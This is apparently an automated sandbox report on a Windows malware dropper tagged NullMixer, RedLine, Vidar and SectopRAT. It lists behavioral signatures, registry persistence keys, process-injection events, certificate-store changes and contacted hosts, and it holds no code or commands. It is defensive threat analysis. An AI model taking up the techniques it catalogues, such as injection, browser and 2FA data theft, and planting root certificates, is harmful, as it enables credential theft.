Malware Analysis Report

2025-01-02 06:04

Sample ID 241207-k73yza1qhl
Target d1adee00a2745df94375ba4d0026c637_JaffaCakes118
SHA256 486d5231a35dc4e4cb3417a1353c300298824a9df98890a100c596e7c1186aa5
Tags
nullmixer privateloader redline sectoprat vidar build1 aspackv2 discovery dropper execution infostealer loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

486d5231a35dc4e4cb3417a1353c300298824a9df98890a100c596e7c1186aa5

Threat Level: Known bad

The file d1adee00a2745df94375ba4d0026c637_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

nullmixer privateloader redline sectoprat vidar build1 aspackv2 discovery dropper execution infostealer loader persistence rat spyware stealer trojan

Redline family

RedLine

Vidar

Privateloader family

Nullmixer family

Vidar family

NullMixer

PrivateLoader

RedLine payload

SectopRAT payload

SectopRAT

Sectoprat family

Vidar Stealer

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

ASPack v2.12-2.42

Reads user/profile data of web browsers

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Checks installed software on the system

Looks up external IP address via web service

Accesses 2FA software files, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in Windows directory

System Location Discovery: System Language Discovery

Program crash

Browser Information Discovery

Enumerates physical storage devices

Unsigned PE

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Modifies system certificate store

Suspicious use of SendNotifyMessage

Checks SCSI registry key(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Modifies data under HKEY_USERS

Scheduled Task/Job: Scheduled Task

Checks processor information in registry

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-07 09:15

Signatures

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-12-07 09:15

Reported

2024-12-07 09:18

Platform

win7-20240903-en

Max time kernel

58s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload


Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload


Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Vidar Stealer

stealer

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\97c06d9b6fa6f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\97c06d9b6fa6f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\f08378aa2c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\f08378aa2c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\97c06d9b6fa6f9.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\97c06d9b6fa6f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS434E1686\0637ac7677d0cf7.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A
N/A ipinfo.io N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2220 set thread context of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS434E1686\f08378aa2c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS434E1686\97c06d9b6fa6f9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{EBB58E41-B47B-11EF-9D9B-465533733A50} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\61d1121b032c3d74.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\d5a6f77b01f6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1076 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe
PID 1076 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe
PID 1076 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe
PID 1076 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe
PID 1076 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe
PID 1076 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe
PID 1076 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe
PID 2756 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
